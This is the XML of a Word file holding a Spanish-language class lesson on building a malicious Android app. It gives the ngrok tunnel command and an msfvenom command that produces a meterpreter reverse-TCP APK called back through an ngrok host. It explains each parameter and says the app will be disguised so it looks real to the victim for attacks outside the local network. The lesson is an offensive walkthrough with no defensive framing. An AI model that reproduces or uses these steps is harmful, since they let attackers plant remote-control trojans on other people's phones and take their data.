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AD1" w:rsidRDefault="00CE2AD1" w:rsidP="00CE2AD1">
      <w:r>
        <w:t>Hola a tod@s nuevamente en esta clase vamos a crear una aplicación maliciosa, la cual luego vamos a ir modificando para que sea lo más real posible para la víctima.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE2AD1" w:rsidRDefault="00CE2AD1" w:rsidP="00CE2AD1">
      <w:r>
        <w:t>En un principio vamos a crear la aplicación con msfvenom, pero primero vamos a poner en marcha nuestro servicio puente de ngrok.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE2AD1" w:rsidRDefault="00CE2AD1" w:rsidP="00CE2AD1">
      <w:r>
        <w:t>Recuerden que para levantar el servicio de ngrok tenemos que llamarlo con el siguiente comando.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE2AD1" w:rsidRDefault="00CE2AD1" w:rsidP="00CE2AD1"/>
    <w:p w:rsidR="00CE2AD1" w:rsidRDefault="00CE2AD1" w:rsidP="00CE2AD1"/>
    <w:p w:rsidR="00CE2AD1" w:rsidRDefault="00CE2AD1" w:rsidP="00CE2AD1">
      <w:r>
        <w:t>root@computaxion:~# ngrok tcp 4444</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE2AD1" w:rsidRDefault="00CE2AD1" w:rsidP="00CE2AD1"/>
    <w:p w:rsidR="00CE2AD1" w:rsidRDefault="00CE2AD1" w:rsidP="00CE2AD1"/>
    <w:p w:rsidR="00CE2AD1" w:rsidRDefault="00CE2AD1" w:rsidP="00CE2AD1">
      <w:r>
        <w:t>Luego vamos a abrir otra terminal y vamos a ejecutar los siguientes comandos.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE2AD1" w:rsidRDefault="00CE2AD1" w:rsidP="00CE2AD1"/>
    <w:p w:rsidR="00CE2AD1" w:rsidRPr="00CE2AD1" w:rsidRDefault="00CE2AD1" w:rsidP="00CE2AD1">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE2AD1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>root@computaxion:~# msfvenom -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=14240 R &gt;mega-pro.apk</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE2AD1" w:rsidRPr="00CE2AD1" w:rsidRDefault="00CE2AD1" w:rsidP="00CE2AD1">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CE2AD1" w:rsidRPr="00CE2AD1" w:rsidRDefault="00CE2AD1" w:rsidP="00CE2AD1">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CE2AD1" w:rsidRPr="00CE2AD1" w:rsidRDefault="00CE2AD1" w:rsidP="00CE2AD1">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CE2AD1" w:rsidRDefault="00CE2AD1" w:rsidP="00CE2AD1">
      <w:r>
        <w:t xml:space="preserve">Con -p le estamos diciendo que queremos usar un payload para </w:t>
      </w:r>
      <w:r>
        <w:t>Android</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> meterpreter reverso.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE2AD1" w:rsidRDefault="00CE2AD1" w:rsidP="00CE2AD1"/>
    <w:p w:rsidR="00CE2AD1" w:rsidRDefault="00CE2AD1" w:rsidP="00CE2AD1">
      <w:r>
        <w:t>Con LHOST le decimos que queremos usar la dirección que nos brinda ngrok, esto lo hacemos porque vamos a hacer un ataque fuera de la red local, en otro caso podríamos usar nuestra propia ip pública.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE2AD1" w:rsidRDefault="00CE2AD1" w:rsidP="00CE2AD1"/>
    <w:p w:rsidR="00CE2AD1" w:rsidRDefault="00CE2AD1" w:rsidP="00CE2AD1">
      <w:r>
        <w:t xml:space="preserve">Con LPORT le decimos que queremos usar el puerto que nos brinda el puente con ngrok. </w:t>
      </w:r>
      <w:r>
        <w:t>Ojo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> con esto porque es normal que se confundan y coloquen el 4444 que creo la conexión con ngrok. Recuerden que va el puerto que nos brinda NGROK. </w:t>
      </w:r>
      <w:r>
        <w:t>Ej</w:t>
      </w:r>
      <w:r>
        <w:t>. 14555</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE2AD1" w:rsidRDefault="00CE2AD1" w:rsidP="00CE2AD1"/>
    <w:p w:rsidR="00CE2AD1" w:rsidRDefault="00CE2AD1" w:rsidP="00CE2AD1">
      <w:r>
        <w:t xml:space="preserve">Con R le decimos el nombre que le vamos a colocar a nuestra apk y si no agregamos una ruta va a guardar la apk en el lugar por defecto que en mi caso es  "root". En caso de querer colocarla en el escritorio por ejemplo, se lo agregamos. </w:t>
      </w:r>
      <w:r>
        <w:t>Je</w:t>
      </w:r>
      <w:r>
        <w:t>. /root/Desktop</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE2AD1" w:rsidRDefault="00CE2AD1" w:rsidP="00CE2AD1"/>
    <w:p w:rsidR="0079763F" w:rsidRDefault="00CE2AD1" w:rsidP="00CE2AD1">
      <w:r>
        <w:t xml:space="preserve">Bien ahora que ya tenemos ngrok activo y la apk maliciosa creada, vamos a pasar a un nuevo video en el cual editaremos el nombre de la apk. </w:t>
      </w:r>
      <w:r>
        <w:t>Pero</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> antes que nada vamos a editar los permisos desde kali </w:t>
      </w:r>
      <w:r>
        <w:t>Linux</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="007976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AD1"/>
    <w:rsid w:val="0079763F"/>
    <w:rsid w:val="00CE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DD77E-6766-46AC-ABB7-8C3711C6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2020-04-04T02:20:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-04-04T02:23:00Z</dcterms:modified>
</cp:coreProperties>
</file>